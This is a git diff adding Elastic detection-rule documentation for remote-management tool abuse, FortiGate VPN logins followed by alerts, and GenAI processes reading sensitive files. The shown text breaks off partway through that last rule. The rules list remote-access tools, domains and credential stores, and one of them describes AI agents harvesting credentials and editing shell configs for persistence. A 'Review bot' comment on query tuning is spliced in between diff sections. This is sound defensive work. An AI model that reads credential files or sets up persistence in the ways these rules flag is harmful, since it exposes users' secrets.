@@ -0,0 +1,219 @@ +[[prebuilt-rule-8-19-18-first-time-seen-dns-query-to-rmm-domain]] +=== First Time Seen DNS Query to RMM Domain + +Detects DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains from processes that are not browsers. Intended to surface RMM clients, scripts, or other non-browser activity contacting these services. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-7205m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1219/002/ +* https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Time Seen DNS Query to RMM Domain* + + +This rule flags DNS queries to commonly abused RMM or remote access domains when the requesting process is not a browser. Legitimate RMM and remote desktop software is frequently abused for C2, persistence, and lateral movement. + + +*Possible investigation steps* + + +- Identify the process process.executable that performed the DNS query and verify if it is an approved RMM or remote access tool. +- Review the full process tree and parent process to understand how the binary was launched. +- Check process.code_signature for trusted RMM publishers; unsigned or unexpected signers may indicate abuse or trojanized installers. +- Correlate with the companion rule "First Time Seen Remote Monitoring and Management Tool" for the same host to see if the RMM process was first-time seen. 
+- Investigate other alerts for the same host or user in the past 48 hours. + + +*False positive analysis* + + +- Approved RMM or remote support tools used by IT will trigger this rule; consider allowlisting by process path or code signer for known managed tools. +- Some updaters or installers (e.g. signed by the RMM vendor) may resolve these domains; combine with process name or parent context to reduce noise. + + +*Response and remediation* + + +- If unauthorized RMM use is confirmed: isolate the host, remove the RMM software, rotate credentials, and block the domains at DNS/firewall where policy permits. +- Enforce policy that only approved RMM tools from approved publishers may be used, and only by authorized staff. + + +==== Rule query + + +[source, js] +---------------------------------- +FROM logs-endpoint.events.network-*, logs-windows.sysmon_operational-* METADATA _index +| WHERE host.os.type == "windows" + AND event.category == "network" + AND event.action in ("lookup_requested", "DNSEvent (DNS query)") + AND dns.question.name IS NOT NULL + +// Exclude browser processes +| WHERE NOT + process.name IN ( + "chrome.exe", "msedge.exe", "MicrosoftEdge.exe", "MicrosoftEdgeCP.exe", + "firefox.exe", "iexplore.exe", "safari.exe", "brave.exe", + "opera.exe", "vivaldi.exe", "msedgewebview2.exe" + ) + +// Extract the parent domain (last two labels, e.g. example.com) +| GROK dns.question.name """(?:[^.]+\.)+(?[^.]+\.[^.]+)$""" +| EVAL parent_domain = COALESCE(parent_domain, dns.question.name) + +// Known RMM parent domains, add or remove entries here as your environment changes. 
+| WHERE parent_domain IN ( + "teamviewer.com", + "logmein.com", + "logmeinrescue.com", + "logmeininc.com", + "internapcdn.net", + "anydesk.com", + "screenconnect.com", + "connectwise.com", + "splashtop.com", + "zohoassist.com", + "dwservice.net", + "gotoassist.com", + "getgo.com", + "logmeinrescue.com", + "rustdesk.com", + "remoteutilities.com", + "atera.com", + "ammyy.com", + "n-able.com", + "kaseya.net", + "bomgar.com", + "beyondtrustcloud.com", + "parsec.app", + "parsecusercontent.com", + "tailscale.com", + "twingate.com", + "jumpcloud.com", + "vnc.com", + "remotepc.com", + "netsupportsoftware.com", + "getscreen.me", + "beanywhere.com", + "swi-rc.com", + "swi-tc.com", + "qetqo.com", + "tmate.io", + "playanext.com", + "supremocontrol.com", + "itarian.com", + "datto.com", + "auvik.com", + "syncromsp.com", + "pulseway.com", + "immy.bot", + "immybot.com", + "level.io", + "ninjarmm.com", + "ninjaone.com", + "centrastage.net", + "datto.net", + "liongard.com", + "naverisk.com", + "panorama9.com", + "superops.ai", + "superops.com", + "tacticalrmm.com", + "meshcentral.com", + "remotly.com", + "fixme.it", + "islonline.com", + "zoho.eu", + "goverlan.com", + "iperius.net", + "iperiusremote.com", + "remotix.com", + "mikogo.com", + "r-hud.net", + "pcvisit.de", + "netviewer.com", + "helpwire.app", + "remotetopc.com", + "rport.io", + "action1.com", + "tiflux.com", + "gotoresolve.com" +) + +// Aggregate by parent domain and get 1st time seen timestamp as well as unique count of agents +| STATS + event_count = COUNT(*), + Esql.first_time_seen = MIN(@timestamp), + Esql.count_distinct_host_id = COUNT_DISTINCT(host.id), + Esql.process_executable_values = VALUES(process.executable), + Esql.dns_question_name_values = VALUES(dns.question.name), + Esql.host_name_values = VALUES(host.name) BY parent_domain + +// Calculate the time difference between first time seen and rule execution time +| eval Esql.recent = DATE_DIFF("minute", Esql.first_time_seen, now()) + +// First time seen is 
within 6m of the rule execution time and first seen in the last 5 days as per the rule from schedule and limited to 1 unique host +| where Esql.recent <= 6 and Esql.count_distinct_host_id == 1 + +// populate fields for rule exception +| eval host.name = MV_FIRST(Esql.host_name_values), + process.executable = MV_FIRST(Esql.process_executable_values), dns.question.name = MV_FIRST(Esql.dns_question_name_values) +| keep host.name, process.executable, dns.question.name, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ +* Sub-technique: +** Name: Remote Desktop Software +** ID: T1219.002 +** Reference URL: https://attack.mitre.org/techniques/T1219/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-remote-monitoring-and-management-tool.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-remote-monitoring-and-management-tool.asciidoc new file mode 100644 index 0000000000..6edaa169cd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-remote-monitoring-and-management-tool.asciidoc 
@@ -0,0 +1,540 @@ +[[prebuilt-rule-8-19-18-first-time-seen-remote-monitoring-and-management-tool]] +=== First Time Seen Remote Monitoring and Management Tool + +Adversaries may install legitimate remote monitoring and management (RMM) tools or remote access software on compromised endpoints for command-and-control (C2), persistence, and execution of native commands. This rule detects when a process is started whose name or code signature (or whose parent's name or code signature) resembles commonly abused RMM/remote access tools, including first-time-seen child processes of such tools. New Terms type: host has not seen this process (or child-of-RMM pattern) before within the configured history window. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.process-* +* endgame-* +* winlogbeat-* +* logs-windows.forwarded* +* logs-windows.sysmon_operational-* +* logs-system.security* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/ +* https://attack.mitre.org/techniques/T1219/002/ +* https://github.com/redcanaryco/surveyor/blob/master/definitions/remote-admin.json +* https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a +* https://www.cisa.gov/sites/default/files/2025-06/aa25-163a-ransomware-simplehelp-rmm-compromise.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Windows Security Event Logs +* Data Source: Sysmon + +*Version*: 116 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Time Seen Remote 
Monitoring and Management Tool* + + +Remote monitoring and management (RMM) and remote access software are commonly used by IT departments to provide support and manage endpoints. Attackers adopt the same tools to connect into interactive sessions, maintain access as a persistence mechanism, and drop malicious software. + +This rule detects when an RMM or remote access process is seen on a host for the first time within the new_terms history window (see rule.new_terms), enabling analysts to investigate and enforce the correct usage of such tools. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Check if the execution of the RMM or remote access tool is approved by the organization's IT department. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Contact the account owner and confirm whether they are aware of this activity. + - If the tool is not approved for use in the organization, the employee could have been tricked into installing it and providing access to a malicious third party. Investigate whether this third party could be attempting to scam the end-user or gain access to the environment through social engineering. +- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes. + + +*False positive analysis* + + +- If an authorized support person or administrator used the tool to conduct legitimate support or remote access, consider reinforcing that only tooling approved by the IT policy should be used. The analyst can dismiss the alert if no other suspicious behavior is observed involving the host or users. 
+ + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If an unauthorized third party did the access via social engineering, consider improvements to the security awareness program. +- Enforce that only tooling approved by the IT policy should be used for remote access purposes and only by authorized staff. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Setup + + + +*Setup* + + +- **New terms window**: The rule uses `new_terms_fields: host.id` with a 7-day history window. The first time a matching RMM/remote access process is seen on a host within that window will trigger the alert. +- **Velociraptor**: If your organization deploys Velociraptor for DFIR or hunting, consider adding a rule exception by host group or excluding `process.name: "Velociraptor.exe"` where appropriate. +- **Elastic Defend**: For best coverage ensure process events with `process.code_signature` and `process.name` are ingested from Windows endpoints (e.g. logs-endpoint.events.process-*). +- **Parent matching**: The rule also matches when the started process's parent has an RMM/remote access name or code signer, so first-time child processes (e.g. scripts or binaries spawned by TeamViewer, ScreenConnect, AteraAgent, MeshAgent) are detected. Complement with DNS-based detection (e.g. 
Sigma rule for remote access software domains from non-browser processes) for full coverage. + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type: "windows" and + + event.category: "process" and event.type: "start" and + + ( + process.code_signature.subject_name : ( + "Action1 Corporation" or + "AeroAdmin LLC" or + "Ammyy LLC" or + "Atera Networks Ltd" or + "AWERAY PTE. LTD." or + "BeamYourScreen GmbH" or + "Bomgar Corporation" or + "DUC FABULOUS CO.,LTD" or + "DOMOTZ INC." or + "DWSNET OÜ" or + "FleetDeck Inc" or + "GlavSoft LLC" or + "GlavSoft LLC." or + "Hefei Pingbo Network Technology Co. Ltd" or + "IDrive, Inc." or + "IMPERO SOLUTIONS LIMITED" or + "Instant Housecall" or + "ISL Online Ltd." or + "LogMeIn, Inc." or + "Monitoring Client" or + "MMSOFT Design Ltd." or + "Nanosystems S.r.l." or + "NetSupport Ltd" or + "NetSupport Ltd." or + "NETSUPPORT LTD." or + "NinjaRMM, LLC" or + "Parallels International GmbH" or + "philandro Software GmbH" or + "Pro Softnet Corporation" or + "RealVNC" or + "RealVNC Limited" or + "BreakingSecurity.net" or + "Remote Utilities LLC" or + "Rocket Software, Inc." or + "SAFIB" or + "Servably, Inc." or + "ShowMyPC INC" or + "Splashtop Inc." or + "Superops Inc." or + "TeamViewer" or + "TeamViewer GmbH" or + "TeamViewer Germany GmbH" or + "Techinline Limited" or + "uvnc bvba" or + "Yakhnovets Denis Aleksandrovich IP" or + "Zhou Huabing" or + "ZOHO Corporation Private Limited" or + "Connectwise, LLC" or + "ScreenConnect Client" or + "Servably Inc." 
+ ) or + + process.name.caseless : ( + AA_v*.exe or + "AeroAdmin.exe" or + "AnyDesk.exe" or + "apc_Admin.exe" or + "apc_host.exe" or + "AteraAgent.exe" or + aweray_remote*.exe or + "AweSun.exe" or + "AgentMon.exe" or + "B4-Service.exe" or + "BASupSrvc.exe" or + "bomgar-scc.exe" or + "domotzagent.exe" or + "domotz-windows-x64-10.exe" or + "dwagsvc.exe" or + "DWRCC.exe" or + "ImperoClientSVC.exe" or + "ImperoServerSVC.exe" or + "ISLLight.exe" or + "ISLLightClient.exe" or + fleetdeck_commander*.exe or + "getscreen.exe" or + "g2aservice.exe" or + "GoToAssistService.exe" or + "gotohttp.exe" or + "jumpcloud-agent.exe" or + "level.exe" or + "LvAgent.exe" or + "LMIIgnition.exe" or + "LogMeIn.exe" or + "ManageEngine_Remote_Access_Plus.exe" or + "MeshAgent.exe" or + "Mikogo-Service.exe" or + "NinjaRMMAgent.exe" or + "NinjaRMMAgenPatcher.exe" or + "ninjarmm-cli.exe" or + "parsec.exe" or + "PService.exe" or + "quickassist.exe" or + "r_server.exe" or + "radmin.exe" or + "radmin3.exe" or + "RCClient.exe" or + "RCService.exe" or + "RemoteDesktopManager.exe" or + "RemotePC.exe" or + "RemotePCDesktop.exe" or + "RemotePCService.exe" or + "rfusclient.exe" or + "ROMServer.exe" or + "ROMViewer.exe" or + "RPCSuite.exe" or + "rserver3.exe" or + "rustdesk.exe" or + "rutserv.exe" or + "rutview.exe" or + "saazapsc.exe" or + ScreenConnect*.exe or + "session_win.exe" or + "Remote Support.exe" or + "smpcview.exe" or + "spclink.exe" or + "Splashtop-streamer.exe" or + "Syncro.Overmind.Service.exe" or + "SyncroLive.Agent.Runner.exe" or + "SRService.exe" or + "strwinclt.exe" or + "Supremo.exe" or + "SupremoService.exe" or + "tacticalrmm.exe" or + "tailscale.exe" or + "tailscaled.exe" or + "teamviewer.exe" or + "ToDesk_Service.exe" or + "twingate.exe" or + "TiClientCore.exe" or + "TSClient.exe" or + "tvn.exe" or + "tvnserver.exe" or + "tvnviewer.exe" or + UltraVNC*.exe or + UltraViewer*.exe or + "vncserver.exe" or + "vncviewer.exe" or + "winvnc.exe" or + "winwvc.exe" or + "Zaservice.exe" or + 
"ZohoURS.exe" or + "Velociraptor.exe" or + "ToolsIQ.exe" or + "CagService.exe" or + "ScreenConnect.ClientService.exe" or + "TiAgent.exe" or + "GoToResolveProcessChecker.exe" or + "GoToResolveUnattended.exe" or + "Syncro.Installer.exe" + ) or + process.name : ( + AA_v*.exe or + "AeroAdmin.exe" or + "AnyDesk.exe" or + "apc_Admin.exe" or + "apc_host.exe" or + "AteraAgent.exe" or + aweray_remote*.exe or + "AweSun.exe" or + "AgentMon.exe" or + "B4-Service.exe" or + "BASupSrvc.exe" or + "bomgar-scc.exe" or + "CagService.exe" or + "domotzagent.exe" or + "domotz-windows-x64-10.exe" or + "dwagsvc.exe" or + "DWRCC.exe" or + "ImperoClientSVC.exe" or + "ImperoServerSVC.exe" or + "ISLLight.exe" or + "ISLLightClient.exe" or + fleetdeck_commander*.exe or + "getscreen.exe" or + "g2aservice.exe" or + "GoToAssistService.exe" or + "gotohttp.exe" or + "jumpcloud-agent.exe" or + "level.exe" or + "LvAgent.exe" or + "LMIIgnition.exe" or + "LogMeIn.exe" or + "ManageEngine_Remote_Access_Plus.exe" or + "MeshAgent.exe" or + "meshagent.exe" or + "Mikogo-Service.exe" or + "NinjaRMMAgent.exe" or + "NinjaRMMAgenPatcher.exe" or + "ninjarmm-cli.exe" or + "parsec.exe" or + "PService.exe" or + "quickassist.exe" or + "r_server.exe" or + "radmin.exe" or + "radmin3.exe" or + "RCClient.exe" or + "RCService.exe" or + "RemoteDesktopManager.exe" or + "RemotePC.exe" or + "RemotePCDesktop.exe" or + "RemotePCService.exe" or + "rfusclient.exe" or + "ROMServer.exe" or + "ROMViewer.exe" or + "RPCSuite.exe" or + "rserver3.exe" or + "rustdesk.exe" or + "rutserv.exe" or + "rutview.exe" or + "saazapsc.exe" or + ScreenConnect*.exe or + "session_win.exe" or + "Remote Support.exe" or + "smpcview.exe" or + "spclink.exe" or + "Splashtop-streamer.exe" or + "Syncro.Overmind.Service.exe" or + "SyncroLive.Agent.Runner.exe" or + "SRService.exe" or + "strwinclt.exe" or + "Supremo.exe" or + "SupremoService.exe" or + "tacticalrmm.exe" or + "tailscale.exe" or + "tailscaled.exe" or + "teamviewer.exe" or + "TiClientCore.exe" or + 
"ToDesk_Service.exe" or + "twingate.exe" or + "TSClient.exe" or + "tvn.exe" or + "tvnserver.exe" or + "tvnviewer.exe" or + UltraVNC*.exe or + UltraViewer*.exe or + "vncserver.exe" or + "vncviewer.exe" or + "winvnc.exe" or + "winwvc.exe" or + "Zaservice.exe" or + "ZohoURS.exe" or + "Velociraptor.exe" or + "ToolsIQ.exe" or + "ScreenConnect.ClientService.exe" or + "TiAgent.exe" or + "GoToResolveProcessChecker.exe" or + "GoToResolveUnattended.exe" or + "Syncro.Installer.exe" + ) or + process.parent.code_signature.subject_name : ( + "Action1 Corporation" or + "AeroAdmin LLC" or + "Ammyy LLC" or + "Atera Networks Ltd" or + "AWERAY PTE. LTD." or + "BeamYourScreen GmbH" or + "Bomgar Corporation" or + "DUC FABULOUS CO.,LTD" or + "DOMOTZ INC." or + "DWSNET OÜ" or + "FleetDeck Inc" or + "GlavSoft LLC" or + "GlavSoft LLC." or + "Hefei Pingbo Network Technology Co. Ltd" or + "IDrive, Inc." or + "IMPERO SOLUTIONS LIMITED" or + "Instant Housecall" or + "ISL Online Ltd." or + "LogMeIn, Inc." or + "Monitoring Client" or + "MMSOFT Design Ltd." or + "Nanosystems S.r.l." or + "NetSupport Ltd" or + "NetSupport Ltd." or + "NETSUPPORT LTD." or + "NinjaRMM, LLC" or + "Parallels International GmbH" or + "philandro Software GmbH" or + "Pro Softnet Corporation" or + "RealVNC" or + "RealVNC Limited" or + "BreakingSecurity.net" or + "Remote Utilities LLC" or + "Rocket Software, Inc." or + "SAFIB" or + "Servably, Inc." or + "ShowMyPC INC" or + "Splashtop Inc." or + "Superops Inc." or + "TeamViewer" or + "TeamViewer GmbH" or + "TeamViewer Germany GmbH" or + "Techinline Limited" or + "uvnc bvba" or + "Yakhnovets Denis Aleksandrovich IP" or + "Zhou Huabing" or + "ZOHO Corporation Private Limited" or + "Connectwise, LLC" or + "ScreenConnect Client" or + "Servably Inc." 
+ ) or + process.parent.name: ( + AA_v*.exe or + "AeroAdmin.exe" or + "AnyDesk.exe" or + "apc_Admin.exe" or + "apc_host.exe" or + "AteraAgent.exe" or + aweray_remote*.exe or + "AweSun.exe" or + "AgentMon.exe" or + "B4-Service.exe" or + "BASupSrvc.exe" or + "bomgar-scc.exe" or + "domotzagent.exe" or + "domotz-windows-x64-10.exe" or + "dwagsvc.exe" or + "DWRCC.exe" or + "ImperoClientSVC.exe" or + "ImperoServerSVC.exe" or + "ISLLight.exe" or + "ISLLightClient.exe" or + fleetdeck_commander*.exe or + "getscreen.exe" or + "g2aservice.exe" or + "GoToAssistService.exe" or + "gotohttp.exe" or + "jumpcloud-agent.exe" or + "level.exe" or + "LvAgent.exe" or + "LMIIgnition.exe" or + "LogMeIn.exe" or + "ManageEngine_Remote_Access_Plus.exe" or + "MeshAgent.exe" or + "Mikogo-Service.exe" or + "NinjaRMMAgent.exe" or + "NinjaRMMAgenPatcher.exe" or + "ninjarmm-cli.exe" or + "parsec.exe" or + "PService.exe" or + "quickassist.exe" or + "r_server.exe" or + "radmin.exe" or + "radmin3.exe" or + "RCClient.exe" or + "RCService.exe" or + "RemoteDesktopManager.exe" or + "RemotePC.exe" or + "RemotePCDesktop.exe" or + "RemotePCService.exe" or + "rfusclient.exe" or + "ROMServer.exe" or + "ROMViewer.exe" or + "RPCSuite.exe" or + "rserver3.exe" or + "rustdesk.exe" or + "rutserv.exe" or + "rutview.exe" or + "saazapsc.exe" or + ScreenConnect*.exe or + "session_win.exe" or + "Remote Support.exe" or + "smpcview.exe" or + "spclink.exe" or + "Splashtop-streamer.exe" or + "Syncro.Overmind.Service.exe" or + "SyncroLive.Agent.Runner.exe" or + "SRService.exe" or + "strwinclt.exe" or + "Supremo.exe" or + "SupremoService.exe" or + "tacticalrmm.exe" or + "tailscale.exe" or + "tailscaled.exe" or + "teamviewer.exe" or + "ToDesk_Service.exe" or + "twingate.exe" or + "TiClientCore.exe" or + "TSClient.exe" or + "tvn.exe" or + "tvnserver.exe" or + "tvnviewer.exe" or + UltraVNC*.exe or + UltraViewer*.exe or + "vncserver.exe" or + "vncviewer.exe" or + "winvnc.exe" or + "winwvc.exe" or + "Zaservice.exe" or + 
"ZohoURS.exe" or + "Velociraptor.exe" or + "ToolsIQ.exe" or + "CagService.exe" or + "TiAgent.exe" or + "GoToResolveProcessChecker.exe" or + "GoToResolveUnattended.exe" + ) + ) and + not (process.pe.original_file_name : ("G2M.exe" or "Updater.exe" or "powershell.exe") and process.code_signature.subject_name : "LogMeIn, Inc.") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ +* Sub-technique: +** Name: Remote Desktop Software +** ID: T1219.002 +** Reference URL: https://attack.mitre.org/techniques/T1219/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-fortigate-ssl-vpn-login-followed-by-siem-alert-by-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-fortigate-ssl-vpn-login-followed-by-siem-alert-by-user.asciidoc new file mode 100644 index 0000000000..9e3b69af33 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-fortigate-ssl-vpn-login-followed-by-siem-alert-by-user.asciidoc 
@@ -0,0 +1,105 @@
+[[prebuilt-rule-8-19-18-fortigate-ssl-vpn-login-followed-by-siem-alert-by-user]]
+=== FortiGate SSL VPN Login Followed by SIEM Alert by User
+
+Detects when a FortiGate SSL VPN login event is followed by any SIEM detection alert for the same user name within a short time window. This correlation can indicate abuse of VPN access for malicious activity, credential compromise used from a VPN session, or initial access via VPN followed by post-compromise behavior.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* logs-fortinet_fortigate.log-*
+* .alerts-security.*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://attack.mitre.org/tactics/TA0001/
+* https://www.elastic.co/docs/reference/integrations/fortinet_fortigate
+
+*Tags*:
+
+* Use Case: Threat Detection
+* Rule Type: Higher-Order Rule
+* Tactic: Initial Access
+* Data Source: Fortinet
+* Resources: Investigation Guide
+
+*Version*: 2
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating FortiGate SSL VPN Login Followed by SIEM Alert by User*
+
+
+This rule correlates a FortiGate SSL VPN login with a subsequent security alert for the same user name, highlighting possible abuse of VPN access or activity shortly after remote access.
+
+
+*Possible investigation steps*
+
+
+- Review the FortiGate login event (source IP, user, time) and the SIEM alert(s) that followed for the same user.
+- Determine whether the user is expected to use VPN and whether the subsequent alert is related to legitimate work (e.g. admin tools, updates).
+- Check for other alerts or logins for the same user in the same time window to assess scope.
+- Correlate with authentication logs to identify impossible travel or credential reuse from the VPN session.
+
+
+*False positive analysis*
+
+
+- Legitimate VPN users triggering detections (e.g. scripted tasks, admin tooling) after login.
+- Security scans or automated jobs that run in the context of a VPN-authenticated user.
+
+
+*Response and remediation*
+
+
+- If abuse or compromise is suspected, disable or reset the user’s VPN access and credentials.
+- Investigate the host and process associated with the SIEM alert.
+- Escalate to the security or incident response team if the alert indicates malicious activity.
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+sequence by user.name with maxspan=10m
+ [authentication where event.dataset == "fortinet_fortigate.log" and event.action == "login" and event.code in ("0101039426", "0101039427") and
+ user.name != "root"]
+ [any where event.kind == "signal" and kibana.alert.rule.name != null and event.dataset != "fortinet_fortigate.log" and
+ kibana.alert.risk_score > 21 and kibana.alert.rule.rule_id != "a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e" and user.name != null]
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Initial Access
+** ID: TA0001
+** Reference URL: https://attack.mitre.org/tactics/TA0001/
+* Technique:
+** Name: Valid Accounts
+** ID: T1078
+** Reference URL: https://attack.mitre.org/techniques/T1078/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-accessing-sensitive-files.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-accessing-sensitive-files.asciidoc
new file mode 100644
index 0000000000..cf03eaa44d
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-accessing-sensitive-files.asciidoc
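Review bot: The sequence is declared with `maxspan=10m` but the rule only searches back `now-9m`, so a login that happened more than nine minutes before a run can fall outside the search window while still being inside the sequence span; raising the lookback above the span (for example `now-15m`, a constructed value to be tuned) or documenting the trade-off in the guide would avoid silently missed correlations. The join key `user.name` is compared exactly, so a FortiGate login recorded as `jsmith` will not pair with an endpoint alert carrying `JSMITH` or a domain-qualified form; a sentence under *False positive analysis* noting that the two data sources must emit the same user-name format would help analysts who see fewer matches than expected. The excluded `kibana.alert.rule.rule_id` is presumably this rule's own id to prevent self-triggering; a query comment such as `// exclude this rule's own alerts` would make that intent explicit.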
@@ -0,0 +1,182 @@ +[[prebuilt-rule-8-19-18-genai-process-accessing-sensitive-files]] +=== GenAI Process Accessing Sensitive Files + +Detects when GenAI tools access sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations. Attackers leverage GenAI agents to systematically locate and exfiltrate credentials, API keys, and tokens. Access to credential stores (.aws/credentials, .ssh/id_*) suggests harvesting, while writes to shell configs (.bashrc, .zshrc) indicate persistence attempts. Note: On linux only creation events are available. Access events are not yet implemented. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://atlas.mitre.org/techniques/AML.T0085 +* https://atlas.mitre.org/techniques/AML.T0085.001 +* https://atlas.mitre.org/techniques/AML.T0055 +* https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks +* https://www.elastic.co/security-labs/elastic-advances-llm-security +* https://specterops.io/blog/2025/11/21/an-evening-with-claude-code + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* OS: Windows +* Use Case: Threat Detection +* Tactic: Collection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM +* Mitre Atlas: T0085 +* Mitre Atlas: T0085.001 +* Mitre Atlas: T0055 + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating GenAI Process Accessing Sensitive Files* + + +This rule detects GenAI tools accessing credential files, SSH keys, browser data, or shell configurations. 
While GenAI tools legitimately access project files, access to sensitive credential stores is unusual and warrants investigation. + + +*Possible investigation steps* + + +- Review the GenAI process that triggered the alert to identify which tool is being used and verify if it's an expected/authorized tool. +- Investigate the user account associated with the GenAI process to determine if this activity is expected for that user. +- Review the types of sensitive files being accessed (credentials, keys, browser data, etc.) to assess the potential impact of credential harvesting or data exfiltration. +- Check for other alerts or suspicious activity on the same host around the same time, particularly network exfiltration events. +- Verify if the GenAI tool or extension is from a trusted source and if it's authorized for use in your environment. +- Determine if the GenAI process accessed multiple sensitive directories in sequence, an indication of credential harvesting. +- Check if the GenAI tool recently created or accessed AI agent config files, which may contain instructions enabling autonomous file scanning. +- Review whether the access was preceded by an MCP server, LangChain agent, or background automation. + + +*False positive analysis* + + +- Automated security scanning or auditing tools that leverage GenAI may access sensitive files as part of their normal operation. +- Development workflows that use GenAI tools for code analysis may occasionally access credential files. + + +*Response and remediation* + + +- Immediately review the GenAI process that accessed the documents to determine if it's compromised or malicious. +- Review, rotate, and revoke any API keys, tokens, or credentials that may have been exposed or used by the GenAI tool. +- Investigate the document access patterns to determine the scope of potential data exfiltration. +- Update security policies to restrict or monitor GenAI tool usage in the environment, especially for access to sensitive files. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +file where event.action in ("open", "creation", "modification") and event.outcome == "success" and + + // GenAI process + ( + process.name in ( + "ollama.exe", "ollama", "Ollama", + "textgen.exe", "textgen", "text-generation-webui.exe", "oobabooga.exe", + "lmstudio.exe", "lmstudio", "LM Studio", + "claude.exe", "claude", "Claude", + "cursor.exe", "cursor", "Cursor", + "copilot.exe", "copilot", "Copilot", + "codex.exe", "codex", + "Jan", "jan.exe", "jan", + "gpt4all.exe", "gpt4all", "GPT4All", + "gemini-cli.exe", "gemini-cli", + "genaiscript.exe", "genaiscript", + "grok.exe", "grok", + "qwen.exe", "qwen", + "koboldcpp.exe", "koboldcpp", "KoboldCpp", + "llama-server", "llama-cli" + ) or + // OpenClaw/Moltbot/Clawdbot via Node.js + (process.name in ("node", "node.exe") and + process.command_line like~ ("*openclaw*", "*moltbot*", "*clawdbot*")) + ) and + + // Sensitive file paths + ( + // Persistence via Shell configs + file.name in (".bashrc", ".bash_profile", ".zshrc", ".zshenv", ".zprofile", ".profile", ".bash_logout") or + + // Credentials In Files + file.name like~ + ("key?.db", + "logins.json", + "Login Data", + "Local State", + "signons.sqlite", + "Cookies", + "cookies.sqlite", + "Cookies.binarycookies", + 